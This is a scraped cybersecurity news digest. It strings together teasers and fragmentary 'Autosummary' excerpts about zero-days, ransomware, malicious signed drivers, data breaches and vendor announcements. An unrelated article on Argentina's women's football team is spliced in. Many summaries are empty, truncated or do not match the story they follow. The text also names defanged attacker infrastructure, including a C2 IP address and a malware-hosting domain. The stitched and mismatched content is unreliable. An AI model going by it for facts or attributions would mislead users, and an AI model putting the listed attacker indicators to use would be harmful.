Fake PNG files contained in the ISO archive (Unit 42) Unit 42 reports that this campaign has targeted at least 22 of the 80 foreign missions in Kyiv, including those of the United States, Canada, Turkey, Spain, Netherlands, Greece, Estonia, and Denmark. "Autosummary:
"Autosummary:
" Argentina"s World Cup-winning men"s team had to abandon an open-top bus parade in Buenos Aires and instead took a helicopter ride over the millions of ecstatic fans partying in the streets following their World Cup triumph 6,000 miles and 3am kick-offs Up to 40,000 Argentina fans were in Qatar in December but the numbers in New Zealand backing the women for group matches against 2019 quarter-finalists Italy, African champions South Africa and World Cup heavyweights Sweden are likely to be in the hundreds instead of thousands. "Most people in Argentina are fans of football - but women"s football, it"s not that popular," Daniela Lichinizer, a sports reporter for TN Deportivo in Argentina, tells BBC Sport." Florencia Bonsegundo met Lionel Messi in 2019 From shoe factory to World Cup There are no lucrative sponsorship deals for women"s players in Argentina, while forward Estefania Banini - regarded as the Messi of the women"s team external-link - has played much of her club football away in Spain. "IT teams need help to monitor and enforce BYOD policies during summer months when more employees often travel or work remotely. In this Help Net Security video, Jeremy Ventura, Director, Security Strategy & Field CISO at ThreatX, discusses how employees increasingly rely on personal devices to access corporate data during the summer, which could open the door to cyber criminals seeking to penetrate corporate networks.
The post Cybersecurity best practices while working in the summer appeared first on Help Net Security.
"Autosummary:
"It is important not to underestimate the potentially devastating impact of DDoS attacks. Organizations of all sizes should take proactive measures to mitigate and safeguard against DDoS attacks, ensuring the continuity and resilience of their operations. Throughout this Help Net Security video round-up, experts emphasize the need for a collective effort in the fight against DDoS attacks. Complete videos Bryant Rump, Principal Security Architect at Neustar Security Services, talks about the challenges of mitigating immense … More
The post Industry responses and strategies for navigating the tides of DDoS attacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Apple has patched an actively exploited zero-day vulnerability (CVE-2023-37450) by releasing Rapid Security Response updates for iPhones, iPads and Macs running the latest versions of its operating systems. The vulnerability has also been fixed with a regular security update in Safari (16.5.2), so users running macOS Big Sur and macOS Monterey can also implement the fix. About CVE-2023-37450 As per usual, Apple doesn’t say much about the fixed vulnerability. All we know is that CVE-2023-37450: … More
The post Apple pushes out emergency fix for actively exploited zero-day (CVE-2023-37450) appeared first on Help Net Security.
"Autosummary:
Smaller security updates In May 2023, Apple started delivering Rapid Security Response updates to owners of Apple smartphones, tablets and computers running the latest versions of iOS, iPadOS, and macOS. "Autosummary:
In addition, the malware disables the Task Manager to prevent users from terminating or investigating its process and aborts itself if the machine"s language matches that of Russian, Belarusian, Ukrainian, Kazakh, Kyrgyz, Armenian, Georgian, Tatar, and Uzbek. "VMware warns customers of the public availability of an exploit code for the RCE vulnerability CVE-2023-20864 affecting vRealize. VMware warned customers of the availability of an exploit code for the critical RCE vulnerability CVE-2023-20864 in the VMware Aria Operations for Logs analysis tool (formerly vRealize Log Insight). VMware Aria Operations for Networks (formerly vRealize Network Insight) is […]
The post VMware warns customers of exploit available for critical vRealize RCE flaw CVE-2023-20864 appeared first on Security Affairs.
"Autosummary:
"Resecurity identified the emergence of adversarial mobile Android-based Antidetect Tooling for Mobile OS-Based Fraud. Resecurity has identified the emergence of adversarial mobile Android-based tools (called “mobile anti-detects”), like Enclave and McFly, as a new frontier in fraud tradecraft evolution. These tools are used by criminals involved in online-banking theft to impersonate compromised account holders and […]
The post Cybercriminals Evolve Antidetect Tooling for Mobile OS-Based Fraud appeared first on Security Affairs.
"Autosummary:
This report from Resecurity includes a comprehensive list of the top PC-based antidetect kits, such as AntBrowser, Lalicat, Aezakmi, ClonBrowser, MultiLogin, Sphere, GoLogin, Incognition, VMMask, Dolphin{anty}, VMLogin, IndigoBrowser, SessionBox, Octo Browser, MoreLogin, Undetectable, LinkenSphere, and Kameleo. "Alteryx announced decision intelligence and intelligent automation capabilities on AWS designed to empower chief financial officers (CFOs) and finance leaders to embrace cloud and data analytics as strategic tools for their modernization goals. “Analytic insights help us tailor digital transformation solutions based on our clients’ needs to achieve the greatest impact for their business,” said Ana Margarita Albir, president at ADL Labs. “Leveraging Alteryx and AWS, we are able to integrate capabilities across any data … More
The post Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes appeared first on Help Net Security.
"Autosummary:
“Organizations can benefit from templates that help data analysts and line-of-business users to use, customize, extend, and integrate enterprise data with intelligent automation workflows that assist with record to report, procure to pay, and order to cash processes.” "Autosummary:
"Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture," Sysdig security researcher Alessandro Brucato said in a new report shared with The Hacker News. "Apple released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address an actively exploited zero-day. Apple has released Rapid Security Response updates for iOS, iPadOS, macOS, and Safari web browser to address a zero-day flaw, tracked as CVE-2023-37450, that has been actively exploited in the wild. Tricking the victim into processing specially crafted web content may lead to […]
The post Apple issued Rapid Security Response updates to fix a zero-day but pulled them due to a Safari bug appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Rapid Security Response) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Excel.exe Graph.exe MSAccess.exe MSPub.exe PowerPoint.exe Visio.exe WinProj.exe WinWord.exe Wordpad.exe This flaw was disclosed by Microsoft Threat Intelligence, Vlad Stolyarov, Clement Lecigne and Bahare Sabouri of Google’s Threat Analysis Group (TAG), Paul Rascagneres and Tom Lancaster with Volexity, and the Microsoft Office Product Group Security Team. Microsoft says that the flaw was discovered by Vlad Stolyarov and Maddie Stone of Googles Threat Analysis Group (TAG) CVE-2023-36884 - Office and Windows HTML Remote Code Execution Vulnerability Microsoft has released guidance on a publicly disclosed, unpatched zero-day that allows remote code execution using specially-crafted Microsoft Office documents. "Autosummary:
Drivers were [sic] signed with an end-entity certificate issued before July 29th, 2015 that chains to a supported cross-signed CA A new report by Cisco Talos explains that Chinese threat actors are exploiting the third policy by using two open-source tools, "HookSignTool" and "FuckCertVerify," to alter the signing date of malicious drivers before July 29th, 2015. "Autosummary:
The public German bank, which is one of the largest in the world, having total assets of $1.5 trillion and an annual net income of $6.3 billion, stated that the incident impacted customers in Germany who used its account switching service in 2016, 2017, 2018, and 2020. "Autosummary:
What"s more, it has been observed that HookSignTool has been used to re-sign cracked drivers in order to bypass digital rights management (DRM) integrity checks, with an actor named "Juno_Jr" releasing a cracked version of PrimoCache, a legitimate software caching solution, in a Chinese software cracking forum on November 9, 2022." "The third exception creates a loophole that allows a newly compiled driver to be signed with non-revoked certificates issued prior to or expired before July 29, 2015, provided that the certificate chains to a supported cross-signed certificate authority," the cybersecurity company said. "HCA Healthcare disclosed a data breach that exposed the personal information of roughly 11 million patients. HCA Healthcare this week announced that the personal information of roughly 11 million patients was compromised in a data breach. The organization discovered the security breach on July 5 when a threat actor claimed the hack on an underground […]
The post HCA Healthcare data breach impacted 11 million patients appeared first on Security Affairs.
"Autosummary:
As proof of the hack, the threat actors posted stolen info for some of the patients, including: Patient name, city, state, and zip code; Patient email, telephone number, date of birth, gender; and Patient service date, location and next appointment date. "Autosummary:
Those not using these protections can add the following application names to the HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key as values of type REG_DWORD with data 1: Excel.exe Graph.exe MSAccess.exe MSPub.exe PowerPoint.exe Visio.exe WinProj.exe WinWord.exe Wordpad.exe However, it"s important to note that setting this registry key to block exploitation attempts, may also impact some Microsoft Office functionality linked to the applications listed above. "For July 2023 Patch Tuesday, Microsoft has delivered 130 patches; among them are four for vulnerabilites actively exploited by attackers, but no patch for CVE-2023-36884, an Office and Windows HTML RCE vulnerability exploited in targeted attacks aimed at defense and government entities in Europe and North America. About CVE-2023-36884 “Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to … More
The post Microsoft patches four exploited zero-days, but lags with fixes for a fifth (CVE-2023-36884) appeared first on Help Net Security.
"Autosummary:
Microsoft has also patched: CVE-2023-35311, a vulnerability that is being used to bypass the Microsoft Outlook Security Notice prompt CVE-2023-36874, an elevation of privilege (EoP) flaw in the Windows Error Reporting Service, exploited to gain administrator privileges (exploitation reported by Google TAG researchers) CVE-2023-32046, an EoP vulnerability in the Windows MSHTML Platform that allowed attackers to gain the rights of the user that is running the affected application Removing malicious signed drivers “Microsoft also issued guidance regarding the malicious use of signed drivers through its Microsoft Windows Hardware Developer Program (MWHDP),” noted Satnam Narang, senior staff research engineer at Tenable. "Categories: Exploits and vulnerabilities Categories: News Tags: Apple Tags: Safari Tags: WebKit Tags: macOS Tags: iOS Tags: iPadOs Tags: CVE-2023-37450 Tags: drive-by Tags: code execution Apple has issued an update for a zero-day vulnerability in the WebKit browser engine which may be actively exploited. |
The post Apple issues Rapid Security Response for zero-day vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
While Apple doesn"t disclose, discuss, or confirm security issues until a patch is made available and users have had the opportunity to apply them, what we can conclude from that description is that the bug could be used for drive-by downloads as it might allow an attacker to execute arbitrary code by tricking users into opening web pages containing specially crafted content. "Categories: Personal Tags: app Tags: finance Tags: india Tags: loan Tags: rogue Tags: Apple Store Tags: play store Tags: google Tags: threaten Tags: blackmail Tags: sextortion Tags: fake Tags: deepfake Tags: deepfakes Tags: morph Multiple finance apps have been removed from the App Store after making dubious charges and issuing blackmail threats and other awful behavior. |
The post Threatening rogue finance apps removed from the Apple Store appeared first on Malwarebytes Labs.
"Autosummary:
TechCrunch reports that “Pocket Kash, White Kash, Golden Kash, and OK Rupee” among others were taken down after getting close to the top 20 finance app listing spots. "In April 2023, Australian law firm HWL Ebsworth was hit by a cyberattack that possibly resulted in data of hundreds of its clients and dozens of government agencies being compromised. The attack was claimed by the Russian-linked ALPHV/Blackcat ransomware group “Earlier this month, the group published 1.1TB of the data it claimed to have stolen, later established to be 3.6TB worth of data,” Guardian Australia reported. Throughout January and February of 2023, eSentire, deflected 10 … More
The post Law firms under cyberattack appeared first on Help Net Security.
"Autosummary:
Password attacks are also frequent among law firms, primarily attributed to security vulnerabilities such as password reuse, weak passwords, excessive permissions, open access, and the absence of multi-factor authentication (MFA). As the UK National Cyber Security Centre (NCSC) noted in a recent report focusing on cyber threats to the legal sector, law firms handle sensitive client information that cybercriminals may find useful, including exploiting opportunities for insider trading, gaining the upper hand in negotiations and litigation, or subverting the course of justice. "The evolving cyberattack landscape reveals the increasing utilization of generative artificial intelligence (AI) systems, like ChatGPT, by cybercriminals for crafting malicious content and executing sophisticated attacks, according to Acronis. The biannual threat report highlights ransomware as the dominant risk to small and medium-sized businesses. And while the number of new ransomware variants continues to decline, ransomware attacks’ severity remains significant. Equally concerning is the growing prominence of data stealers, who leverage stolen credentials to gain … More
The post Number of email-based phishing attacks surges 464% appeared first on Help Net Security.
"Autosummary:
“To address the dynamic threat landscape, organizations need agile, comprehensive, unified security solutions that provide the necessary visibility to understand attacks, simplify context, and provide efficient remediation of any threat, whether it may be malware, system vulnerability, and everything in between,” Wüest continued.A sound cybersecurity posture requires a multi-layered solution that combines anti-malware, EDR, DLP, email security, vulnerability assessment, patch management, RMM, and backup capabilities. "Ransomware attacks increased by over 37% in 2023 compared to the previous year, with the average enterprise ransom payment exceeding $100,000, with a $5.3 million average demand, according to Zscaler. Since April 2022, ThreatLabz has identified thefts of several terabytes of data as part of several successful ransomware attacks, which were then used to extort ransoms. Encryptionless extortion attacks “Ransomware-as-a-Service has contributed to a steady rise in sophisticated ransomware attacks,” said Deepen Desai, Global CISO … More
The post New disturbing ransomware trend threatens organizations appeared first on Help Net Security.
"Autosummary:
The most prevalent ransomware families that Zscaler ThreatLabz has been tracking include BlackBasta, BlackCat, Clop, Karakurt, and LockBit, all of which pose a significant threat of financial losses, data breaches, and operational disruption to individuals and organizations of all sizes. "The French government is going to grant law enforcement the power to spy on suspects through smartphones and other devices. French legislators are going to approve a justice reform bill that also gives more power to law enforcement, allowing them to spy on suspects through their smartphones and other electronic devices. According to the French […]
The post France’s government is giving the police more surveillance power appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, French government, surveillance) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Honeywell has agreed to acquire SCADAfence, a provider of OT and IoT cybersecurity solutions for monitoring large-scale networks. SCADAfence brings proven capabilities in asset discovery, threat detection and security governance which are key to industrial and buildings management cybersecurity programs. The OT cybersecurity industry is expected to grow to greater than $10 billion in the next several years. Particularly in the industrial sector, cyberattacks focused on OT systems can be a significant source of unplanned … More
The post Honeywell acquires SCADAfence to strengthen its OT cybersecurity portfolio appeared first on Help Net Security.
"Autosummary:
“SCADAfence is an ideal complement to Honeywell’s OT cybersecurity portfolio and, when combined with the Honeywell Forge Cybersecurity+ suite, it enables us to provide an end-to-end solution with applicability to asset, site and enterprise across key Honeywell sectors,” said Dehoff. "A tool that automates the delivery of malware from external attackers to target employees’ Microsoft Teams inbox has been released. TeamsPhisher (Source: Alex Reid) About the exploited vulnerability As noted by Jumpsec researchers Max Corbridge and Tom Ellson, Microsoft Teams’ default configuration lets external tenants (i.e., M365 users outside the organization) message an organization’s employees. The same configuration doesn’t allow external tenants to send files, but that restriction can be bypassed by switching the internal … More
The post Malware delivery to Microsoft Teams users made easy appeared first on Help Net Security.
"Autosummary:
TeamsPhisher (Source: Alex Reid) About the exploited vulnerability As noted by Jumpsec researchers Max Corbridge and Tom Ellson, Microsoft Teams’ default configuration lets external tenants (i.e., M365 users outside the organization) message an organization’s employees. "Autosummary:
Included among the fetched payloads is "icepdfeditor.exe," a valid signed binary by ZOHO Corporation Private Limited, which, when executed, sideloads a rogue DLL ("ffmpeg.dll") codenamed the Krita Loader. "Autosummary:
"Autosummary:
"Autosummary:
Session expiration message (BleepingComputer) Researcher Bob Diachenko discovered in 2020 an unprotected Razer database containing full names, email addresses, phone numbers, customer IDs, order details, and billing and shipping addresses of 100,000 customers. "Organized criminal groups exploited a flaw in Revolut’s payment systems and made off with $20+ million of the company’s money, the Financial Times reported on Sunday, citing people with knowledge of the situation. Revolut’s cybersecurity troubles Revolut is a privately held financial technology company that offers a variety of services to over 30 million customers around the globe. It is headquartered in London and licensed and regulated by the Bank of Lithuania (within the EU). … More
The post Flaw in Revolut payment systems exploited to steal $20 million appeared first on Help Net Security.
"Autosummary:
In September 2022, the company suffered a data breach that affected 50,150 customers worldwide: the attackers grabbed those customers’ names, addresses, email addresses, telephone numbers, part of the payment card data, and account details. "Autosummary:
The backdoor eventually writes "security.dll" to run automatically at reboot for persistence and awaits commands from the C2, which, based on previous reporting, includes data exfiltration, downloading of additional payloads, deleting files or directories, spawning processes with spoofed PID, as well as starting a reverse shell. "Autosummary:
"Autosummary:
"A Proof-of-Concept (PoC) exploit for the CVE-2023-31998 vulnerability in the Ubiquiti EdgeRouter has been publicly released. The CVE-2023-31998 flaw (CVSS v3 5.9) is a heap overflow issue impacting Ubiquiti EdgeRouters and Aircubes, an attacker can exploit it to potentially execute arbitrary code and interrupt UPnP service to a vulnerable device. The flaw resides in the […]
The post Experts released PoC exploit for Ubiquiti EdgeRouter flaw appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ubiquiti) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Personal Tags: Malwarebytes Tags: Browser Guard Tags: Premium Tags: new features Malwarebytes Browser Guard introduces three new features: Content control, import & export, and historical detection statistics |
The post Malwarebytes Browser Guard introduces three new features appeared first on Malwarebytes Labs.
"Autosummary:
"Categories: News Categories: Ransomware Tags: TrueBot Tags: Cl0p Tags: Silence Group Tags: CVE-2022-31199 Tags: Raspberry Robin Tags: FlawedGrace Tags: Cobalt Strike Tags: Teleport CISA, the FBI, the MS-ISAC, and the CCCS have warned about increased activity of the TrueBot malware in the US and Canada. |
The post Warning issued over increased activity of TrueBot malware appeared first on Malwarebytes Labs.
"Autosummary:
In a joint advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) have warned about newly identified TrueBot malware variants used against organizations in the US and Canada.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Posted: July 10, 2023 by CISA, the FBI, the MS-ISAC, and the CCCS have warned about increased activity of the TrueBot malware in the US and Canada. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Island Enterprise Browser: Intelligent security built into the browsing session In this Help Net Security interview, Mike Fey, CEO of Island, explains the differences between consumer browsers and the Island Enterprise Browser, how it protects organizations’ data, and how it uses contextual information to provide users with a safe browsing experience. Promoting responsible AI: Balancing innovation and regulation In this … More
The post Week in review: Fileless attacks increase 1,400%, consumers ditch brands hit by ransomware appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: June 2023 Here’s a look at the most interesting products from the past month, featuring releases from: 1Password, Bitdefender, Cequence Security, ConnectSecure, Cymulate, Cytracom, Datadog, Delinea, Edgescan, Enveedo, ESET, Index Engines, Island, iStorage, Lacework, NetApp, Netscout, Netskope, NinjaOne, Okta, Permit.io, PingSafe, Quantinuum, Seceon, and Zilla Security. "Autosummary:
"Autosummary:
GorjolEcho infection chain (Proofpoint) Attacks on macOS If the victim uses macOS, which the hackers typically realize after they fail to infect them with the Windows payload, they send a new link to “library-store[.]camdvr[.]org” that hosts a ZIP file masquerading as a RUSI (Royal United Services Institute) VPN app. "Autosummary:
"Google released July security updates for Android that addressed tens of vulnerabilities, including three actively exploited flaws. July security updates for Android addressed more than 40 vulnerabilities, including three flaws that were actively exploited in targeted attacks. “There are indications that the following may be under limited, targeted exploitation.” reads the security bulletin. The CVE-2023-26083 is […]
The post Google addressed 3 actively exploited flaws in Android appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Processes terminated before encryption (Trend Micro) The Windows, Recycle Bin, Program Files, Temp, Program Data, Microsoft, and App Data directories are skipped from encryption to avoid rendering the system unusable. "Autosummary:
"The usage of platforms like Cash App, Zelle, and Venmo for peer-to-peer payments has experienced a significant surge, with scams increasing by over 58%. Additionally, there has been a corresponding rise of 44% in scams stemming from the theft of personal documents, according to IDIQ. AI voice technology The report also highlights the rise of AI voice scams as a significant trend in 2023. AI voice technology enables scammers to create remarkably realistic voices and … More
The post Scammers using AI voice technology to commit crimes appeared first on Help Net Security.
"Autosummary:
Protecting against AI voice cloning scams Ways the public can help protect themselves from these scams: Being cautious of unsolicited offers, requests, and calls Always verifying identities, including having a family “password” Using strong cybersecurity practices, including unique passwords, multi-factor authentication and VPN Protecting and monitoring personal information Educating themselves on the latest scams and trends as new scams continue to arise Scammers are also taking advantage of peer-to-peer payment platforms lack of protection, convenience and limited refund policies to steal from victims as part of Cash App, Zelle and Venmo scams. "Autosummary:
Reserve Your Spot The second patch level, released on July 5, targets kernel and closed source components, tackling 20 vulnerabilities in Kernel, Arm, Imagination Technologies, MediaTek, and Qualcomm components. "Autosummary:
This API key reset will, however, disrupt certain functionalities like AD import, HRIS integrations, JumpCloud PowerShell modules, JumpCloud Slack apps, Directory Insights Serverless apps, ADMU, third-party zero-touch MDM packages, Command Triggers, Okta SCIM integration, Azure AD SCIM integration, Workato, Aquera, Tray, and more. "Autosummary:
The tool can create scheduled tasks and inject payloads into msiexec[.]exe and svchost[.]exe, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to 92.118.36[.]199, for example, as well as load dynamic link libraries (DLLs) to accomplish privilege escalation," the advisory says.Importantly, the Netwrix Auditor software is employed by more than 13,000 organizations worldwide, including notable firms such as Airbus, Allianz, the UK NHS, and Virgin. "Autosummary:
"Autosummary:
Key features and capabilities of a robust CTEM program include: Automated discovery of assets and management of vulnerabilities Ongoing vulnerability assessment of threat exposures within the attack surface of threat exposures within the attack surface Security validation to eliminate false positives and guarantee accuracy Gaining visibility into the attacker"s perspective and potential avenues of attack Prioritizing remediation efforts and integrating them with DevSecOps workflows Start Your CTEM Program Today Security executives require continuous Threat Exposure Management solutions that enhance, support, and expand their in-house team"s abilities to neutralize threats at their origin, preventing costly and damaging security breaches. Faster Adversaries, Inadequate Protection, and Preventable Incidents In 2023, despite significant investments in security infrastructure and skilled personnel, existing approaches are struggling to effectively reduce risks, manage threat exposures, and prevent security breaches. "Autosummary:
The findings indicate that hackers can complete the entire attack process, from gaining initial access to causing significant damage, in just five days. "Autosummary:
"Autosummary:
"Autosummary:
Eliminate cyber risk, harness real-time, actionable insights and receive automated, round-the-clock risk-based vulnerability management today with Outscan NX. Risk-Based Vulnerability Management In comparison to traditional and outdated approaches to vulnerability management, a risk-based strategy enables organizations to assess the level of risk posed by vulnerabilities. "Autosummary:
A third vulnerability, tracked as CVE-2023-2136 and rated as critical severity, is an integer overflow bug found in Google"s Skia, an open-source multi-platform 2D graphics library. "Autosummary:
The "Letscall" group consists of Android developers, designers, frontend and backend developers, as well as call operators specializing in voice social engineering attacks. "A man from Tracy, California, has been charged with a computer attack on the Discovery Bay water treatment facility. Rambler Gallo (53), a man from Tracy (California) has been charged with intentionally causing damage to a computer after he allegedly breached the network of the Discovery Bay Water Treatment Facility. The man targeted the water […]
The post A man has been charged with a cyber attack on the Discovery Bay water treatment facility appeared first on Security Affairs.
"Autosummary:
Then, in January of 2021, after Gallo had resigned from Company A, he allegedly accessed the facility’s computer system remotely and transmitted a command to uninstall software that was the main hub of the facility’s computer network and that protected the entire water treatment system, including water pressure, filtration, and chemical levels.” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, water treatment facility) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Personal Categories: Ransomware Tags: ransomware Tags: vice Tags: education Tags: files Tags: dark web Tags: ssn Tags: stolen identity Data stolen during attacks on schools can contain highly sensitive information. |
The post How kids pay the price for ransomware attacks on education appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks against education, June 2022-May 2023 And, while ransomware attacks against education are a global phenomenon, the USA and the UK saw far higher rates of attacks than other countries.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The ransomware groups are to blame, of course, but the education sector can improve a few things to lessen the impact of a ransomware attack. "A researcher recently discovered that a Bangladesh government website leaks the personal data of citizens. The researcher Viktor Markopoulos discovered a Bangladeshi government website that was leaking the personal information of millions of Bangladesh citizens. According to TechCrunch, which first reported the news, the leaked data included full names, phone numbers, email addresses, and national […]
The post Bangladesh government website leaked data of millions of citizens appeared first on Security Affairs.
"Autosummary:
"Regulatory compliance and cybersecurity improvement are not two sides of the same coin: they are distinct pillars that demand specialized attention. Achieving compliance does not create an impenetrable fortress against threats, it merely creates a baseline defense. So, how can organizations transition from a reactive, “tick-box” mindset to a proactive culture of continuous cyber improvement? This question is central to increasing cyber resilience. For those navigating the patchwork of regulatory environments, a deeper understanding of … More
The post How to cultivate a culture of continuous cybersecurity improvement appeared first on Help Net Security.
"Autosummary:
CISOs must manage a blend of real-time activities, like monitoring network traffic, threat hunting, and vulnerability detection, with periodic activities, such as pen testing, risk assessments, and audits. On the other hand, periodic security practices, such as penetration testing, provide an opportunity to stress-test the system and uncover potential weaknesses. The urgency of real-time vulnerability management To build a culture of cyber improvement, businesses must foster an effective vulnerability management strategy that relies on incessantly evaluating exposure to potential threats and taking proactive steps to mitigate them. "Computer scientists at the University of Waterloo have discovered a method of attack that can successfully bypass voice authentication security systems with up to a 99% success rate after only six tries. Experts expose flaws in voiceprint technology Voice authentication – which allows companies to verify the identity of their clients via a supposedly unique “voiceprint” – has increasingly been used in remote banking, call centers and other security-critical scenarios. “When enrolling in voice authentication, … More
The post Cybercriminals can break voice authentication with 99% success rate appeared first on Help Net Security.
"Autosummary:
Kassis’ supervisor, computer science professor Urs Hengartner added, “By demonstrating the insecurity of voice authentication, we hope that companies relying on voice authentication as their only authentication factor will consider deploying additional or stronger authentication measures.” "Autosummary:
"Autosummary:
"This known issue was previously resolved with an update for Microsoft Defender Antivirus antimalware platform KB5007651 (Version 1.0.2303.27001) but issues were found, and that update is no longer being offered to devices," Microsoft said at the time. "The European Union Agency for Cybersecurity (ENISA) releases its first cyber threat landscape report for the health sector. The European Union Agency for Cybersecurity (ENISA) releases today its first cyber threat landscape report for the health sector. The report identifies prime threats, threat actors, and trends and covers a period of over 2 years. The […]
The post Ransomware accounts for 54% of cyber threats in the health sector appeared first on Security Affairs.
"Autosummary:
According to the report, organizations in the European health sector experienced a significant number of incidents, with healthcare providers accounting for 53% of the total incidents. Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "A vulnerability in SolarView product can be exploited in attacks targeting organizations in the energy sector. Researchers from the cybersecurity firm VulnCheck reported that the vulnerability CVE-2022-29303 in the solar power monitoring Contec SolarView product can be exploited in attacks targeting organizations in the energy sector. CVE-2022-29303 is an unauthenticated and remote command injection vulnerability […]
The post CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
The vulnerability only impacts Cisco Nexus 9332C, 9364C, and 9500 spine switches (the last ones equipped with a Cisco Nexus N9K-X9736C-FX Line Card) only if they are in ACI mode, are part of a Multi-Site topology, have the CloudSec encryption feature enabled, and are running firmware 14.0 and later releases. "Autosummary:
“There are indications that the following [vulnerabilities] may be under limited, targeted exploitation,” reads Google’s bulletin, highlighting CVE-2023-26083, CVE-2021-29256, and CVE-2023-2136. "Autosummary:
But, of course, as we all know, it"s often still the case that proper backup systems are not in place, or have not been properly tested to see if they will work properly if an emergency recovery of data is required. Image In order to crack the ransomware"s password, Avast"s tool asks for a sample Akira-encrypted file and a copy of the data file before it was hit by the ransomware attack. "TXOne Networks announced its Stellar solution for defending operational stability. Employing TXOne Networks’ approach to security, Cyber-Physical System Detection and Response (CPSDR), Stellar supports the priorities of security and operations without either team having to sacrifice capability or performance. Already protecting customers in semiconductors, manufacturing, oil and gas, automotive, pharmaceuticals and many other industries, Stellar offers seamless detection and prevention capabilities with complete oversight for legacy and new OT devices. With intuitive management and informed … More
The post TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats appeared first on Help Net Security.
"Autosummary:
"ISACA is joining the European Cyber Security Organisation (ECSO). The membership will work to accelerate ECSO and ISACA’s shared commitment to advancing cybersecurity, fostering collaboration and driving digital trust across Europe. ISACA’s membership brings numerous benefits and opportunities for organisations and professionals across Europe. Through collaborating with ECSO, ISACA will share its expertise, resources, and training initiatives to develop the European cybersecurity ecosystem and enhance cybersecurity practices throughout the region. ISACA’s membership in ECSO will … More
The post ISACA joins ECSO to strengthen cybersecurity and digital skills in Europe appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Attack type spread, Q1–Q2 2023 Alt Text: Attack types illustrated: 52% - UDP, 24% - SYN flood, 19% - TCP flood, 5% - other traffic According to Andrey Slastenov, Head of Web Security at Gcore, there has been an increase in the frequency of complex, multi-vector attacks by attackers. Alt Text: Attack types illustrated: 30.1% - Gaming, 24.7% - Telecom, 16.8% - Financial, 28.4% - Other The gaming industry was the most targeted sector, accounting for a considerable proportion of the DDoS attacks. "Autosummary:
"Autosummary:
"Autosummary:
Ransomware Group Lockbit’s Ransomware Blog Page Triple Extortion The group not only encrypts and exfiltrates data, but also additionally attempts to: Target specific employees Conduct a DDoS attack on the company Notify third-parties of the company or otherwise attempts to create additional leverage to force the victim to pay. An individual log can contain credentials for: VPNs and business applications Online banks Retirement accounts Email addresses and more. "Autosummary:
"StackRot is s new security vulnerability in the Linux kernel that could be exploited to gain elevated privileges on a target system. A security vulnerability, dubbed StackRot was found impacting Linux versions 6.1 through 6.4. The issue, tracked as CVE-2023-3269, (CVSS score: 7.8), is a privilege escalation issue that resides in the memory management subsystem. An unprivileged […]
The post StackRot, a new Linux Kernel privilege escalation vulnerability appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Linux) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Exploits and vulnerabilities Categories: News Tags: Medtronic Tags: Paceart Optima Tags: CVE-2023-31222 Tags: deserialization Tags: update Tags: messaging A vulnerability in Medtronic"s Paceart Optima cardiac device could lead to further network penetration, RCE, and DoS attacks |
The post Warning issued over vulnerability in cardiac devices appeared first on Malwarebytes Labs.
"Autosummary:
Posted: July 6, 2023 by A vulnerability in Medtronic"s Paceart Optima cardiac device could lead to further network penetration, RCE, and DoS attacks The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a vulnerability that could result in remote code execution or a denial-of-service (DoS) condition impacting a healthcare delivery organization’s Paceart Optima system. "Categories: Exploits and vulnerabilities Categories: News Tags: Google Tags: Android Tags: 2023-07-05 Tags: CVE2021-29256 Tags: CVE-2023-26083 Tags: CVE-2023-2136 Tags: CVE-2023-21250 Tags: ARM Tags: Skia Google has patched 43 vulnerabilities in Android, three of which are actively exploited zero-day vulnerabilities. |
The post Update Android now! Google patches three actively exploited zero-days appeared first on Malwarebytes Labs.
"Autosummary:
